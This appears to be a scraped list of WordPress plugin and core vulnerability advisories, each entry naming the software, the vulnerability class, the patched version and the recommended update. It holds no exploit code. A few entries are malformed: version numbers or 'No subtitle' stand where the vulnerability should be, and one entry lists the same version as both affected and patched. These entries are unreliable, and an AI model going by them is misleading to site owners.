Plugin: HTML5 Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.1.5
Recommended Action: Update to version 1.7.1.5, or a newer patched version

Plugin: Floating Tweets

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dashboard Widgets Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Word Balloon

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.19.3
Recommended Action: Update to version 4.19.3, or a newer patched version

Plugin: Customer Reviews Collector for WooCommerce

Vulnerability: No subtitle
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: WebARX

Vulnerability: Firewall Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Resume Submissions & Job Postings

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Path Traversal
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Controlled Admin Access

Vulnerability: Improper Access Control & Privilege Escalation
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Bulk Datetime Change

Vulnerability: Missing Authorization
Patched Version: 1.12
Recommended Action: Update to version 1.12, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Unauthenticated Cache Poisoning
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Core: WordPress

Vulnerability: Remote Code Execution
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: CSV Injection
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Sublanguage

Vulnerability: Missing Authorization
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Votecount For Balatarin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Index

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.67
Recommended Action: Update to version 6.67, or a newer patched version

Plugin: Simple visitor stat

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: SQL Injection
Patched Version: 3.1.0.4
Recommended Action: Update to version 3.1.0.4, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.002
Recommended Action: Update to version 3.9.002, or a newer patched version

Plugin: Garee’s Flickr Feed

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Multiple Marker

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Build 5 Star Reviews on Google Reviews, Yelp, Facebook… easily and risk-free | RRatingg

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.2.54
Recommended Action: Update to version 1.2.54, or a newer patched version

Plugin: bbPress

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 2.5.13
Recommended Action: Update to version 2.5.13, or a newer patched version

Plugin: Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 5.1.0.3
Recommended Action: Update to version 5.1.0.3, or a newer patched version

Plugin: fmoblog

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import and export users and customers

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 1.20.5
Recommended Action: Update to version 1.20.5, or a newer patched version

Plugin: Pop-Up Chop Chop

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Tracking

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.7.16
Recommended Action: Update to version 2.7.16, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.21.3
Recommended Action: Update to version 2.21.3, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Unauthenticated PHAR Deserialization
Patched Version: 2.9.8.6
Recommended Action: Update to version 2.9.8.6, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Missing Authorization to Plugin Settings Change/Delete, Demo Import, Directory Kit Deletion via wdk_admin_action
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: BuddyForms Moderation ( Former: Review Logic )

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.17
Recommended Action: Update to version 1.4.17, or a newer patched version

Plugin: Download Theme

Vulnerability: Cross-Site Request Forgery via dtwap_download()
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Plotly

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Missing Authorization to Job Posting Manipulation
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: Video Sidebar Widgets

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress MU

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: WP Social AutoConnect

Vulnerability: Cross-Site Request Forgery via jfb_admin_page
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: TCD Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTML5 Lyrics Karaoke Player

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPCargo Track & Trace

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 6.9.5
Recommended Action: Update to version 6.9.5, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: SQL Injection
Patched Version: 7.5.18.727
Recommended Action: Update to version 7.5.18.727, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Slider Hero with Video Background, Animation

Vulnerability: SQL Injection
Patched Version: 8.2.7
Recommended Action: Update to version 8.2.7, or a newer patched version

Plugin: Photospace Gallery

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Social Share Buttons & Analytics Plugin – GetSocial.io

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Mapping multiple URLs redirect same page

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Store Locator for WordPress with Google Maps – LotsOfLocales

Vulnerability: 3.11
Patched Version: 3.12
Recommended Action: Update to version 3.12, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Plugin: Direct Checkout – Quick View – Buy Now For WooCommerce

Vulnerability: Authenticated (Shop manager+) Stored Cross-Site Scripting via Custom CSS Code
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Wp photo text slider 50

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 8.1
Recommended Action: Update to version 8.1, or a newer patched version

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Missing Authorization
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Remote File Inclusion
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: BadgeOS

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Property Listings

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: FAQs Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OAuth client Single Sign On for WordPress ( OAuth 2.0 SSO )

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Email Users

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7.6
Recommended Action: Update to version 4.7.6, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: Duplicate Page or Post

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: SEMA API

Vulnerability: SQL Injection
Patched Version: 4.02
Recommended Action: Update to version 4.02, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.27
Recommended Action: Update to version 4.27, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via title_size Parameter
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WPC Product Bundles for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Fontiran

Vulnerability: Missing Authorization via fi_add_rule and fi_delete_webfont_php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Information Disclosure and PHAR deserialization
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Authentication Bypass
Patched Version: 4.9.17.1
Recommended Action: Update to version 4.9.17.1, or a newer patched version

Plugin: WordPress Comments Import & Export

Vulnerability: CSV Injection
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via vx-entries shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Photo Gallery Slideshow & Masonry Tiled Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Content text slider on post

Vulnerability: Cross-Site Scripting
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Akismet Anti-spam: Spam Protection

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated File Deletion
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: LIQUID SPEECH BALLOON

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_edit_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Websimon Tables

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: LoDash Update
Patched Version: 5.4.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.4.7, 5.5.6, 5.6.5, 5.7.3, 5.8.1

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Staff Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 5.16.2
Recommended Action: Update to version 5.16.2, or a newer patched version

Plugin: Aviary Image Editor Add-on For Gravity Forms

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Super Cache

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Multiple Stored Cross-Site Scripting
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: PlanSo Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email posts to subscribers

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Verification Code for Comments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Arbitrary Image Renaming
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Save as PDF Plugin by Pdfcrowd

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: 1.4.3
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: salesking

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: Note Press

Vulnerability: Authenticated (Admin+) SQL Injection via ids Parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction

Vulnerability: SQL Injection
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Ultimate Addons for WPBakery

Vulnerability: Authenticated (Contributor+) Local File Inclusion
Patched Version: 3.19.15
Recommended Action: Update to version 3.19.15, or a newer patched version

Plugin: 3dady real-time web stats

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: vn-calendar

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 1.7.0.13
Recommended Action: Update to version 1.7.0.13, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MP3-jPlayer

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: MyTube PlayList

Vulnerability: Reflected Cross-Site Scripting via addplaylistid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LA-Studio Element Kit for Elementor

Vulnerability: Missing Authorization
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Polo Video Gallery – Best wordpress video gallery plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.16.0
Recommended Action: Update to version 5.16.0, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Security & Malware scan by CleanTalk

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 2.121
Recommended Action: Update to version 2.121, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.9.4
Recommended Action: Update to version 2.5.9.4, or a newer patched version

Plugin: Events Addon for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: No subtitle
Patched Version: 3.13.3
Recommended Action: Update to version 3.13.3, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Featured Image alt Attribute
Patched Version: 8.2.0
Recommended Action: Update to version 8.2.0, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.001
Recommended Action: Update to version 3.9.001, or a newer patched version

Plugin: Super Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Custom Fields Search

Vulnerability: Cross-Site Scripting
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: RSS for Yandex Turbo

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.30
Recommended Action: Update to version 1.30, or a newer patched version

Plugin: Remove Footer Credit

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Social proof testimonials and reviews by Repuso

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.02
Recommended Action: Update to version 5.02, or a newer patched version

Plugin: Health Check & Troubleshooting

Vulnerability: Missing Authorization Checks
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated (Editor+) Privilege Escalation
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Authenticated (Contributor+) Server Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Tiles

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.1.1
Recommended Action: Update to one of the following versions, or a newer patched version: 5.1.1, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, 5.7.2, 5.8.1, 5.9.1, 6.0.1, 6.1.2, 6.2.2, 6.3.4, 6.4.3, 6.5.1, 6.6.2, 6.7.1, 6.8.2, 6.9.1, 7.0.2, 7.1.2, 7.2.2, 7.3.2, 7.4.2, 7.5.4, 7.6.1, 7.7.3, 7.8.1, 7.9.1

Plugin: leenk.me

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Educare – Students & Result Management System

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WP Duplicate Page

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Digital Climate Strike WP

Vulnerability: Malicious Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dovetail

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NOSpamPTI

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Missing Authorization
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.66
Recommended Action: Update to version 1.2.66, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.0.10
Recommended Action: Update to version 5.0.10, or a newer patched version

Plugin: WP Markdown Editor (Formerly Dark Mode)

Vulnerability: Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Not specified in the advisory summary (the entry gives only the affected range, Gutenberg Blocks for Post Grid <= 2.4.9)
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Team Showcase

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Directory Traversal Allowing Arbitrary File Deletion
Patched Version: 2.79.2
Recommended Action: Update to version 2.79.2, or a newer patched version

Plugin: URL Shortener by MyThemeShop

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina)

Vulnerability: Sensitive Information Exposure
Patched Version: 6.4.6
Recommended Action: Update to version 6.4.6, or a newer patched version

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: WP Symposium Pro

Vulnerability: Cross-Site Scripting
Patched Version: 16.01
Recommended Action: Update to version 16.01, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Improper Authorization via wcal_delete_expired_used_coupon_code
Patched Version: 5.16.1
Recommended Action: Update to version 5.16.1, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Missing Authorization Checks
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: ContentStudio

Vulnerability: Missing Authorization
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Email Before Download

Vulnerability: SMTP Header Injection
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: SQL Injection
Patched Version: 5.0.2.2
Recommended Action: Update to version 5.0.2.2, or a newer patched version

Plugin: Wholesale Market for WooCommerce

Vulnerability: Authenticated (Administrator+) Arbitrary File Download
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Reviews Plus

Vulnerability: Denial of Service
Patched Version: 1.2.15
Recommended Action: Update to version 1.2.15, or a newer patched version

Plugin: RapidExpCart

